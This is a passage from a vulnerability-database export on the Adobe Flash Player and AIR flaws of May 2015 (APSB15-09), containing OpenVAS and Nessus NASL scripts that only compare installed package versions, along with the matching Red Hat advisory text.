02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805620\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 10:48:48 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Air Multiple Vulnerabilities - 01 May15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Improper validation of user supplied input.\n\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n\n - Multiple unspecified flaws in Adobe Flash Player.\n\n - A a use-after-free error Adobe Flash Player.\n\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 17.0.0.172 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 17.0.0.172\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"17.0.0.172\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"17.0.0.172\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "Gentoo Linux Local Security Checks GLSA 201505-02", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121376", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201505-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201505-02.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121376\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:49 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201505-02\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201505-02\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201505-02\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.460 \"), vulnerable: make_list(\"lt 11.2.202.460 \"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:37:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851099", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0878-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851099\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:00:42 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0878-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the referenced Adobe Security Bulletin APSB15-09.\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0878-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.460~83.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.460~83.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:03", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3077", "CVE-2015-3078", "CVE-2015-3079", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3083", "CVE-2015-3084", "CVE-2015-3085", "CVE-2015-3086", "CVE-2015-3087", "CVE-2015-3088", "CVE-2015-3089", "CVE-2015-3090", "CVE-2015-3091", "CVE-2015-3092", "CVE-2015-3093"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-09\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-3077, CVE-2015-3078, CVE-2015-3080, CVE-2015-3082,\nCVE-2015-3083, CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\nCVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\nA security bypass flaw was found in flash-plugin that could lead to the\ndisclosure of sensitive information. (CVE-2015-3079)\n\nTwo memory information leak flaws were found in flash-plugin that could\nallow an attacker to potentially bypass ASLR (Address Space Layout\nRandomization) protection, and make it easier to exploit other flaws.\n(CVE-2015-3091, CVE-2015-3092)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.460.\n", "modified": "2018-06-07T09:04:24", "published": "2015-05-13T04:00:00", "id": "RHSA-2015:1005", "href": "https://access.redhat.com/errata/RHSA-2015:1005", "type": "redhat", "title": "(RHSA-2015:1005) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:05:28", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-09 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-3077, CVE-2015-3078,\nCVE-2015-3080, CVE-2015-3082, CVE-2015-3083, CVE-2015-3084,\nCVE-2015-3085, CVE-2015-3086, CVE-2015-3087, CVE-2015-3088,\nCVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\nA security bypass flaw was found in flash-plugin that could lead to\nthe disclosure of sensitive information. (CVE-2015-3079)\n\nTwo memory information leak flaws were found in flash-plugin that\ncould allow an attacker to potentially bypass ASLR (Address Space\nLayout Randomization) protection, and make it easier to exploit other\nflaws. (CVE-2015-3091, CVE-2015-3092)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.460.", "edition": 28, "published": "2015-05-13T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2015:1005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-1005.NASL", "href": "https://www.tenable.com/plugins/nessus/83431", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1005. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83431);\n script_version(\"2.24\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_bugtraq_id(74605, 74608, 74609, 74610, 74612, 74614, 74616, 74617);\n script_xref(name:\"RHSA\", value:\"2015:1005\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2015:1005)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-09 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-3077, CVE-2015-3078,\nCVE-2015-3080, CVE-2015-3082, CVE-2015-3083, CVE-2015-3084,\nCVE-2015-3085, CVE-2015-3086, CVE-2015-3087, CVE-2015-3088,\nCVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\nA security bypass flaw was found in flash-plugin that could lead to\nthe disclosure of sensitive information. (CVE-2015-3079)\n\nTwo memory information leak flaws were found in flash-plugin that\ncould allow an attacker to potentially bypass ASLR (Address Space\nLayout Randomization) protection, and make it easier to exploit other\nflaws. (CVE-2015-3091, CVE-2015-3092)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.460.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1005\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3093\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3079\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3088\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3087\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3085\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3080\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3078\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1005\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.460-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.460-1.el6_6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:05:40", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 26, "published": "2015-05-12T00:00:00", "title": "Google Chrome < 42.0.2311.152 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_42_0_2311_152.NASL", "href": "https://www.tenable.com/plugins/nessus/83366", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83366);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Google Chrome < 42.0.2311.152 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n 